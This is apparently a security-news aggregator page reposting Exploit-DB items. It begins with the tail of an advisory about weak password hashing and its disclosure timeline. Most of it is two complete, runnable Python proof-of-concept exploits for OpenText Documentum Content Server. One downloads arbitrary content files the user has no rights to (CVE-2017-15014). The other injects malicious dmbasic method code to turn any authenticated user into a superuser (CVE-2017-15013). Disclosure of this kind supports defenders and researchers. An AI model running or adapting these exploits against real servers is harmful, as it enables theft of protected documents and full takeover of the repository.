which is a small burden for a user, but a big one for an attacker,
which performs this operation many more times. As passwords usually have
low-entropy, a good password derivation function has to be slow.


Workarounds
-----------
Use a secure password generated by a cryptographically secure random
generator. Wait for a patch that uses a password based key derivation
function like "Argon2" instead of a hash.



About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on
application code reviews, design review and security testing. X41 D-Sec
GmbH was founded in 2015 by Markus Vervier. We support customers in
various industries such as finance, software development and public
institutions.


Timeline
--------
2017-09-28  Issues found
2017-10-05  Vendor contacted
2017-10-09  Vendor contacted, replied to use GitHub for a full disclosure
2017-10-11  Vendor contacted, asked if the vendor is sure to want a full
disclosure
2017-10-12  Vendor contacted, replied to create a public issue on GitHub
2017-10-13  Created public issues on GitHub
2017-10-13  Advisory release

Security News

via Exploit-DB Updates http://ift.tt/1HHo1m3

October 17, 2017 at 02:08PM

[webapps] OpenText Documentum Content Server – Arbitrary File Download

[webapps] OpenText Documentum Content Server – Arbitrary File Download

http://ift.tt/2xMWKll

#!/usr/bin/env python

# Opentext Documentum Content Server (formerly known as EMC Documentum Content Server)
# contains following design gap, which allows authenticated user to download arbitrary
# content files regardless attacker's repository permissions:
#
# when authenticated user upload content to repository he performs following steps:
# - calls START_PUSH RPC-command
# - uploads file to content server
# - calls END_PUSH_V2 RPC-command, here Content Server returns DATA_TICKET,
#    purposed to identify the location of the uploaded file on Content Server filesystem
# - further user creates dmr_content object in repository, which has value of data_ticket equal
#    to the value of DATA_TICKET returned at the end of END_PUSH_V2 call
#
# As the result of such design any authenticated user may create his own dmr_content object,
# pointing to already existing content of Content Server filesystem
#
# The PoC below demonstrates this vulnerability:
#
# MacBook-Pro:~ $ python CVE-2017-15014.py
# usage:
# CVE-2017-15014.py host port user password
# MacBook-Pro:~ $ python CVE-2017-15014.py docu72dev01 10001 dm_bof_registry dm_bof_registry
# Trying to connect to docu72dev01:10001 as dm_bof_registry ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  Linux64.Oracle
# Trying to find any object with content...
# Querying "inaccessible" dmr_content objects...
# Downloaded 3959/3959 bytes of object 06024be980000133
# Downloaded 11280/11280 bytes of object 06024be980000135
# Downloaded 10004/10004 bytes of object 06024be980000138
# Downloaded 23692/23692 bytes of object 06024be98000017a
# Downloaded 19541/19541 bytes of object 06024be980000180
# Downloaded 1096/1096 bytes of object 06024be980000172
# Downloaded 11776/11776 bytes of object 06024be98000011f
# Downloaded 50176/50176 bytes of object 06024be980000125
# Downloaded 16384/16384 bytes of object 06024be98000012f
# Downloaded 985/985 bytes of object 06024be9800001f5
# Downloaded 191/191 bytes of object 06024be9800001fe
# Downloaded 213/213 bytes of object 06024be980000200
#



import socket
import sys

from dctmpy import NULL_ID

from dctmpy.docbaseclient import DocbaseClient
from dctmpy.obj.typedobject import TypedObject

CIPHERS = "ALL:aNULL:!eNULL"


def usage():
    print "usage:\n%s host port user password" % sys.argv[0]


def main():
    if len(sys.argv) != 5:
        usage()
        exit(1)

    (session, docbase) = create_session(*sys.argv[1:5])

    if is_super_user(session):
        print "Current user is a superuser, nothing to do"
        exit(1)

    print "Trying to find any object with content..."
    object_id = session.query(
        "SELECT FOR READ r_object_id "
        "FROM dm_sysobject WHERE r_content_size>0") \
        .next_record()['r_object_id']
    session.apply(None, NULL_ID, "BEGIN_TRANS")
    print "Querying \"inaccessible\" dmr_content objects..."
    for e in session.query(
            "SELECT * FROM dmr_content "
            "WHERE ANY parent_id IS NOT NULLID "
            "AND ANY parent_id NOT IN "
            "(SELECT r_object_id FROM dm_sysobject)"
    ):
        handle = 0
        try:
            content_id = session.next_id(0x06)
            obj = TypedObject(session=session)
            obj.set_string("OBJECT_TYPE", "dmr_content")
            obj.set_bool("IS_NEW_OBJECT", True)
            obj.set_int("i_vstamp", 0)
            obj.set_id("storage_id", e["storage_id"])
            obj.set_id("format", e["format"])
            obj.set_int("data_ticket", e["data_ticket"])
            obj.set_id("parent_id", object_id)
            if not session.save_cont_attrs(content_id, obj):
                print "Failed"
                exit(1)

            handle = session.make_puller(
                NULL_ID, obj["storage_id"], content_id,
                obj["format"], obj["data_ticket"]
            )
            if handle == 0:
                raise RuntimeError("Unable make puller")
            size = 0
            for chunk in session.download(handle):
                size += len(chunk)

            print "Downloaded %d/%d bytes of object %s" % \
                  (size, e['full_content_size'], e['r_object_id'])
        finally:
            if handle > 0:
                try:
                    session.kill_puller(handle)
                except:
                    pass


def create_session(host, port, user, pwd):
    print "Trying to connect to %s:%s as %s ..." % (host, port, user)
    session = None
    try:
        session = DocbaseClient(
            host=host, port=int(port),
            username=user, password=pwd)
    except socket.error, e:
        if e.errno == 54:
            session = DocbaseClient(
                host=host, port=int(port),
                username=user, password=pwd,
                secure=True, ciphers=CIPHERS)
        else:
            raise e
    docbase = session.docbaseconfig['object_name']
    version = session.serverconfig['r_server_version']
    print "Connected to %s:%s, docbase: %s, version: %s" % \
          (host, port, docbase, version)
    return (session, docbase)


def is_super_user(session):
    user = session.get_by_qualification("dm_user WHERE user_name=USER")
    if user['user_privileges'] == 16:
        return True
    group = session.get_by_qualification(
        "dm_group where group_name='dm_superusers' "
        "AND any i_all_users_names=USER")
    if group is not None:
        return True

    return False


if __name__ == '__main__':
    main()

Security News

via Exploit-DB Updates http://ift.tt/1HHo1m3

October 17, 2017 at 02:08PM

[webapps] OpenText Documentum Content Server – dmr_content Privilege Escalation

[webapps] OpenText Documentum Content Server – dmr_content Privilege Escalation

http://ift.tt/2kWJIf4

#!/usr/bin/env python

# Opentext Documentum Content Server (formerly known as EMC Documentum Content Server)
# contains following design gap, which allows authenticated user to gain privileges
# of superuser:
#
# Content Server stores information about uploaded files in dmr_content objects,
# which are queryable and "editable" (before release 7.2P02 any authenticated user
# was able to edit dmr_content objects, now any authenticated user may delete
# dmr_content object and them create new one with the old identifier) by
# authenticated users, this allows any authenticated user to "modify" security-sensitive
# dmr_content objects (for example, dmr_content related to dm_method objects)
# and gain superuser privileges
#
# The PoC below demonstrates this vulnerability:
#
# MacBook-Pro:~ $ python CVE-2017-15013.py
# usage:
# CVE-2017-15013.py host port user password
# MacBook-Pro:~ $ python CVE-2017-15013.py docu72dev01 10001 dm_bof_registry dm_bof_registry
# Trying to connect to docu72dev01:10001 as dm_bof_registry ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  Linux64.Oracle
# Trying to find any dm_method object with content...
#     Trying to poison docbase method dm_Migration
# Method verb: dmbasic -eMigration_Agent
# Method function: Migration_Agent
# Trying to inject new content:
# Const glabel As String          = "Label"
# Const ginfo As String           = "Info"
# Const gerror As String          = "Error"
#
# Private Sub PrintMessage(mssg As String, mssgtype As String)
# If(mssgtype=glabel) Then
# Print "<BR><B><FONT size=3>"
# Print mssg
# print "</FONT></B>"
# ElseIf(mssgtype=ginfo) Then
# Print "<BR><FONT color=blue>"
# Print mssg
# print "</FONT>"
# ElseIf(mssgtype=gerror) Then
# Print "<BR><FONT color=red size=3>"
# Print mssg
# print "</FONT>"
# Else
# Print "<BR>" & mssg
# End If
# End Sub
# Private Sub SetupSuperUser(TargetUser As String)
# objectid$ = dmAPIGet("id,c,dm_user where user_name = '" & TargetUser & "'")
# If objectid$ <> "" then
# Status = dmAPISet("set,c," & objectid$ & ",user_privileges",16)
# Status = dmAPIExec("save,c," & objectid$)
# End If
# End Sub
#
# Sub Migration_Agent(DocbaseName As String, UserName As String, TargetUser As String)
# Dim SessionID As String
#
# SessionID= dmAPIGet("connect," & DocbaseName & "," & UserName & ",")
# If SessionID ="" Then
# Print "Fail to connect to docbase " & DocbaseName &" as user " & UserName
# DmExit(-1)
# Else
# Print "Connect to docbase " & DocbaseName &" as user " & UserName
# End If
#
# Call SetupSuperUser(TargetUser)
#
# End Sub
#
# Removing method's content
# method's content has been successfully removed
# Creating malicious dmr_content object
# Malicious dmr_content object has been successfully created
# Becoming superuser...
# P0wned!
# MacBook-Pro:~ $ python CVE-2017-15013.py docu72dev01 10001 dm_bof_registry dm_bof_registry
# Trying to connect to docu72dev01:10001 as dm_bof_registry ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  Linux64.Oracle
# Current user is a superuser, nothing to do
#



import socket
import sys

from dctmpy import NULL_ID, RPC_APPLY_FOR_BOOL, RPC_APPLY_FOR_OBJECT

from dctmpy.docbaseclient import DocbaseClient
from dctmpy.obj.typedobject import TypedObject

CIPHERS = "ALL:aNULL:!eNULL"


def usage():
    print "usage:\n%s host port user password" % sys.argv[0]


def main():
    if len(sys.argv) != 5:
        usage()
        exit(1)

    (session, docbase) = create_session(*sys.argv[1:5])

    if is_super_user(session):
        print "Current user is a superuser, nothing to do"
        exit(1)

    print "Trying to find any dm_method object with content..."
    method_object = session.get_by_qualification(
        "dm_method WHERE use_method_content=TRUE "
        "and method_verb like 'dmbasic -e%'")
    method_content = session.get_by_qualification(
        "dmr_content where any parent_id='%s'"
        % method_object['r_object_id'])

    print "Trying to poison docbase method %s" % method_object['object_name']
    method_verb = method_object['method_verb']
    print "Method verb: %s" % method_verb
    method_function = method_verb[len("dmbasic -e"):]
    print "Method function: %s" % method_function
    new_content = \
        "Const glabel As String          = \"Label\"\n" \
        "Const ginfo As String           = \"Info\"\n" \
        "Const gerror As String          = \"Error\"\n" \
        "\n" \
        "Private Sub PrintMessage(mssg As String, mssgtype As String)\n" \
        "  If(mssgtype=glabel) Then\n" \
        "            Print \"<BR><B><FONT size=3>\"\n" \
        "            Print mssg\n" \
        "            print \"</FONT></B>\"\n" \
        "  ElseIf(mssgtype=ginfo) Then\n" \
        "            Print \"<BR><FONT color=blue>\"\n" \
        "            Print mssg\n" \
        "            print \"</FONT>\"\n" \
        "  ElseIf(mssgtype=gerror) Then\n" \
        "            Print \"<BR><FONT color=red size=3>\"\n" \
        "            Print mssg\n" \
        "            print \"</FONT>\"\n" \
        "  Else\n" \
        "            Print \"<BR>\" & mssg\n" \
        "  End If\n" \
        "End Sub\n" \
        "Private Sub SetupSuperUser(TargetUser As String)\n" \
        "   objectid$ = dmAPIGet(\"id,c,dm_user where user_name = '\" & TargetUser & \"'\")\n" \
        "   If objectid$ <> \"\" then\n" \
        "      Status = dmAPISet(\"set,c,\" & objectid$ & \",user_privileges\",16)\n" \
        "      Status = dmAPIExec(\"save,c,\" & objectid$)\n" \
        "   End If\n" \
        "End Sub\n" \
        "\n" \
        "Sub %s(DocbaseName As String, UserName As String, TargetUser As String)\n" \
        "  Dim SessionID As String\n" \
        "\n" \
        "  SessionID= dmAPIGet(\"connect,\" & DocbaseName & \",\" & UserName & \",\")\n" \
        "  If SessionID =\"\" Then\n" \
        "    Print \"Fail to connect to docbase \" & DocbaseName &\" as user \" & UserName\n" \
        "    DmExit(-1)\n" \
        "  Else\n" \
        "    Print \"Connect to docbase \" & DocbaseName &\" as user \" & UserName\n" \
        "  End If\n" \
        "\n" \
        "  Call SetupSuperUser(TargetUser)\n" \
        "\n" \
        "End Sub\n" % method_function
    print "Trying to inject new content:\n%s" % new_content

    session.apply(None, NULL_ID, "BEGIN_TRANS")

    if method_content is not None:
        print "Removing method's content"
        remove = TypedObject(session=session)
        remove.set_string("OBJECT_TYPE", "dmr_content")
        remove.set_int("i_vstamp", method_content['i_vstamp'])
        obj = session.apply(RPC_APPLY_FOR_BOOL, method_content['r_object_id'], "dmDisplayConfigExpunge", remove)
        if obj != True:
            print "Failed to remove method's content, exiting"
            end_tran(session, False)
            exit(1)
        print "method's content has been successfully removed"

    store = session.get_by_qualification("dm_store")
    format = session.get_by_qualification("dm_format where name='crtext'")

    handle = session.make_pusher(store['r_object_id'])
    if handle < 1:
        print "Unable to create pusher"
        end_tran(session, False)
        exit(1)

    b = bytearray()
    b.extend(new_content)

    if not session.start_push(handle, method_object['i_contents_id'], format['r_object_id'], len(b)):
        print "Failed to start push"
        end_tran(session, False)
        exit(1)

    session.upload(handle, b)
    data_ticket = session.end_push_v2(handle)['DATA_TICKET']

    print "Creating malicious dmr_content object"
    content = TypedObject(session=session)
    content.set_string("OBJECT_TYPE", "dmr_content")
    content.set_bool("IS_NEW_OBJECT", True)
    content.set_id("storage_id", store['r_object_id'])
    content.set_id("format", format['r_object_id'])
    content.set_int("data_ticket", data_ticket)
    content.set_id("parent_id", method_object['r_object_id'])
    content.set_int("page", 0)
    content.set_string("full_format", format['name'])
    content.set_int("content_size", len(b))
    if not session.save_cont_attrs(method_object['i_contents_id'], content):
        print "Failed to create content"
        end_tran(session, False)
        exit(1)

    print "Malicious dmr_content object has been successfully created"

    end_tran(session, True)

    print "Becoming superuser..."
    method = TypedObject(session=session)
    method.set_string("METHOD", method_object['object_name'])
    method.set_string("ARGUMENTS", "%s %s %s" % (
        session.docbaseconfig['object_name'],
        session.serverconfig['r_install_owner'],
        sys.argv[3]))
    session.apply(RPC_APPLY_FOR_OBJECT, NULL_ID, "DO_METHOD", method)
    r = session.query(
        "SELECT user_privileges FROM dm_user "
        "WHERE user_name=USER") \
        .next_record()[
        'user_privileges']
    if r != 16:
        print "Failed"
        exit(1)
    print "P0wned!"


def end_tran(session, commit=False):
    obj = TypedObject(session=session)
    obj.set_bool("COMMIT", commit)
    session.apply(None, NULL_ID, "END_TRANS", obj)


def create_session(host, port, user, pwd):
    print "Trying to connect to %s:%s as %s ..." % (host, port, user)
    session = None
    try:
        session = DocbaseClient(
            host=host, port=int(port),
            username=user, password=pwd)
    except socket.error, e:
        if e.errno == 54:
            session = DocbaseClient(
                host=host, port=int(port),
                username=user, password=pwd,
                secure=True, ciphers=CIPHERS)
        else:
            raise e
    docbase = session.docbaseconfig['object_name']
    version = session.serverconfig['r_server_version']
    print "Connected to %s:%s, docbase: %s, version: %s" % \
          (host, port, docbase, version)
    return (session, docbase)


def is_super_user(session):
    user = session.get_by_qualification("dm_user WHERE user_name=USER")
    if user['user_privileges'] == 16:
        return True
    group = session.get_by_qualification(
        "dm_group where group_name='dm_superusers' "
        "AND any i_all_users_names=USER")
    if group is not None:
        return True

    return False


if __name__ == '__main__':
    main()

Security News

via Exploit-DB Updates http://ift.tt/1HHo1m3

October 17, 2017 at 02:08PM